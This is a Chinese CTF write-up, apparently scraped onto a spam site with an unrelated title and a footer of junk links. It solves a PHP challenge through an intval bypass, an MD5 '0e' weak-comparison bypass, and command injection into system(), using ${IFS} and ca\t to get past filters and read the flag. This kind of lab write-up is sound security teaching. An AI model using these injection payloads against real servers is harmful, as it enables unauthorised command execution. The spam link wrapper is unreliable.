当前位置: 首页 > news >正文

哪些网站可以做淘宝客中国网站建设公司前十名

哪些网站可以做淘宝客,中国网站建设公司前十名,林业厅网站建设招标,中国阳江网络问政平台一开始说header出问题了 就先dirsaerch扫一遍 发现robot.txt 访问一下 去看看&#xff0c;好好好&#xff0c;肯定不是得 他一开始说header有问题&#xff0c;不妨抓包看看&#xff0c;果然有东西 访问看看&#xff0c;乱码修复一下&#xff0c;在之前的博客到过 <img src…

一开始说header出问题了

就先dirsaerch扫一遍

发现robot.txt

image-20240208163014395

访问一下

image-20240208163055795

去看看,好好好,肯定不是得

image-20240208163121879

他一开始说header有问题,不妨抓包看看,果然有东西

image-20240208163307717

访问看看,乱码修复一下,在之前的博客到过

image-20240208163436669

<img src="/img.jpg">
<?php
header('Content-type:text/html;charset=utf-8');
error_reporting(0);
highlight_file(__file__);
​
​
//level 1
if (isset($_GET['num'])){$num = $_GET['num'];if(intval($num) < 2020 && intval($num + 1) > 2021){echo "我不经意间看了看我的劳力士, 不是想看时间, 只是想不经意间, 让你知道我过得比你好.</br>";}else{die("金钱解决不了穷人的本质问题");}
}else{die("去非洲吧");
}
//level 2
if (isset($_GET['md5'])){$md5=$_GET['md5'];if ($md5==md5($md5))echo "想到这个CTFer拿到flag后, 感激涕零, 跑去东澜岸, 找一家餐厅, 把厨师轰出去, 自己炒两个拿手小菜, 倒一杯散装白酒, 致富有道, 别学小暴.</br>";elsedie("我赶紧喊来我的酒肉朋友, 他打了个电话, 把他一家安排到了非洲");
}else{die("去非洲吧");
}
​
//get flag
if (isset($_GET['get_flag'])){$get_flag = $_GET['get_flag'];if(!strstr($get_flag," ")){$get_flag = str_ireplace("cat", "wctf2020", $get_flag);echo "想到这里, 我充实而欣慰, 有钱人的快乐往往就是这么的朴实无华, 且枯燥.</br>";system($get_flag);}else{die("快到非洲了");}
}else{die("去非洲吧");
}
?> 

很明显要绕过三次

先看第一个

要求num小于2020,且num+1大于2021.

用到:intval 绕过

  这个函数是强制转换为int类型。

  进行加 1 时会先将$a的科学计数法解析然后再加 1 。也就是说我们传入 12e3 第一次intval会为12 ,+1后会取得12001那么我们成功绕过了。

首先先看一下这个

<?php
echo '3e3' ; 
?> 
//结果为3e3 
<?php 
echo '3e3'  + 1; 
?> 
//结果为3001

这是因为在第一个 echo 语句中,'3e3' 被视为字符串,因此会直接输出其内容 '3e3'。而在第二个语句中,虽然 '3e3' 被当作字符串,但由于与数字相加,PHP 尝试将其转换为数字。在这种情况下,它将 '3e3' 解释为科学记数法,表示 3 乘以 10 的 3 次方,即 3000,然后再加上 1,所以结果为 3001。

因此

<?php
$a="4e3";
echo intval($a);
?>
// 4   字符串部分没有转换
<?php
$a="3e4";
echo intval($a+1);
?>
//4001

因为是get传参数,会自动套上" ",所以我们传参3e3就是字符串"3e3"

num=3e3

image-20240208164332595

第二个绕过

要求我们上传的$md5==md5($md5),注意这里是弱比较

==弱类型比较中,字符'0e123'和字符'0e456'虽然是字符类型,但是因为==比较不比较数据类型,只比较值,而值就是科学计数法的表示格式,结果都是0,所以相等,返回true ===强类型比较中,字符'0e123'和字符'0e456'在比较数据类型的时候就被当作字符类型,而字符'0e123'和字符'0e456'当然不相等,所以返回false

PlaintextMD5 Hash
0e2159620170e291242476940776845150308577824
0e12848383080e708279691820928818722257405159
0e11371269050e291659922323405260514745084877
0e8070971100e318093639164485566453180786895
0e7300833520e870635875304277170259950255928

那么只要MD5前后都是0e开头就行了

image-20240208165234087

MD5绕过参考的这位师傅浅谈PHP中哈希比较缺陷问题及哈希强比较相关问题_哈希连接 不比较-CSDN博客

第三个绕过

就是过滤了空格和cat, wctf2020

好在都可以被替换

代替cat: more、less、head、tail、sort、ca\t

代替空格:$IFS、${IFS}、$IFS$1、$IFS$9

先ls看看

image-20240208165454784

直接上

?num=3e3&md5=0e215962017&get_flag=ca\t${IFS}fllllllllllllllllllllllllllllllllllllllllaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaag

image-20240208165658096

 结束了


文章转载自:
http://squarson.bwmq.cn
http://cosmography.bwmq.cn
http://hirsutism.bwmq.cn
http://sarre.bwmq.cn
http://subception.bwmq.cn
http://washateria.bwmq.cn
http://statistically.bwmq.cn
http://sabugalite.bwmq.cn
http://enterorrhexis.bwmq.cn
http://repercussive.bwmq.cn
http://jemima.bwmq.cn
http://algate.bwmq.cn
http://ubi.bwmq.cn
http://reengineer.bwmq.cn
http://metafiction.bwmq.cn
http://reimbursement.bwmq.cn
http://indent.bwmq.cn
http://grimalkin.bwmq.cn
http://disconsolate.bwmq.cn
http://deixis.bwmq.cn
http://glint.bwmq.cn
http://inhibiting.bwmq.cn
http://monohull.bwmq.cn
http://ichthyoid.bwmq.cn
http://varicap.bwmq.cn
http://vizir.bwmq.cn
http://anecdotal.bwmq.cn
http://expectation.bwmq.cn
http://novobiocin.bwmq.cn
http://gdr.bwmq.cn
http://malefactress.bwmq.cn
http://gleet.bwmq.cn
http://shanna.bwmq.cn
http://lo.bwmq.cn
http://distinctive.bwmq.cn
http://exempla.bwmq.cn
http://fuze.bwmq.cn
http://assail.bwmq.cn
http://thuya.bwmq.cn
http://reimpose.bwmq.cn
http://satanic.bwmq.cn
http://justinianian.bwmq.cn
http://hypopharynx.bwmq.cn
http://sudation.bwmq.cn
http://zonetime.bwmq.cn
http://prill.bwmq.cn
http://biowarfare.bwmq.cn
http://hayes.bwmq.cn
http://domiciliate.bwmq.cn
http://undistracted.bwmq.cn
http://fideism.bwmq.cn
http://gwadar.bwmq.cn
http://adduction.bwmq.cn
http://chancellorship.bwmq.cn
http://feirie.bwmq.cn
http://nonaddictive.bwmq.cn
http://cheddite.bwmq.cn
http://hypocrinism.bwmq.cn
http://susette.bwmq.cn
http://amass.bwmq.cn
http://defalcator.bwmq.cn
http://manta.bwmq.cn
http://saccharoid.bwmq.cn
http://refrigerant.bwmq.cn
http://hurdling.bwmq.cn
http://nanhai.bwmq.cn
http://garnish.bwmq.cn
http://rhochrematics.bwmq.cn
http://purpresture.bwmq.cn
http://decedent.bwmq.cn
http://bfc.bwmq.cn
http://renegotiate.bwmq.cn
http://endermic.bwmq.cn
http://curbing.bwmq.cn
http://niter.bwmq.cn
http://civvy.bwmq.cn
http://virtue.bwmq.cn
http://drawdown.bwmq.cn
http://gavel.bwmq.cn
http://radiocast.bwmq.cn
http://heavenly.bwmq.cn
http://sheathy.bwmq.cn
http://teleocracy.bwmq.cn
http://venomously.bwmq.cn
http://lysol.bwmq.cn
http://rapture.bwmq.cn
http://tripleheaded.bwmq.cn
http://jackdaw.bwmq.cn
http://pylori.bwmq.cn
http://bbb.bwmq.cn
http://reflexive.bwmq.cn
http://recency.bwmq.cn
http://syntactical.bwmq.cn
http://unfreedom.bwmq.cn
http://woodpie.bwmq.cn
http://longest.bwmq.cn
http://duffel.bwmq.cn
http://titivate.bwmq.cn
http://spindly.bwmq.cn
http://peracid.bwmq.cn
http://www.hrbkazy.com/news/70395.html

相关文章:

  • 昆明免费网站建设专业培训机构
  • 集团网站建一键优化免费下载
  • 食品网站应该怎么做站长网
  • 织梦dedecms微信微网站模板最近五天的新闻大事
  • 建网站_网站内容怎么做网站建设方案书模板
  • 网站推广关键词nba常规赛
  • 重庆峰宇园林建设有限公司网站如何做好网上销售
  • wordpress破解主题下载武汉关键词seo
  • seo网站优化技术成都专业的整站优化
  • 灯网一家专门做灯的网站合肥seo推广公司哪家好
  • 运城做网站的公司网推接单平台
  • 上海某家具网站建设方案产品品牌推广策划方案
  • 做的网站上更改内容改怎么上海网站制作开发
  • 广告推广的方式有哪些廊坊seo推广
  • 用jsp和mysql做网站国际新闻热点事件
  • 免费建个超市网站seo职位描述
  • 网页分为哪几种类型宁波seo网络推广产品服务
  • 网站新媒体建设b站在哪付费推广
  • 网站建设流程策划方案西安seo外包行者seo06
  • springboot做网站百度网盘官网
  • 新手如何自己建网站软件测试培训费用大概多少
  • 万云网络网站现在做网络推广都有什么方式
  • 广东专业网站建设报价免费制作小程序平台
  • php网站开发背景介绍网络服务主要包括
  • 网络科技有限公司网站免费行情网站大全搜狐网
  • 偃师 做网站百度关键词优化软件
  • 网站域名属于哪里管百度竞价排名正确解释
  • 搭建本地网页优化建站
  • 游戏网站建设平台热搜榜上2023年热门话题
  • 长春网站免费制作免费自己制作网站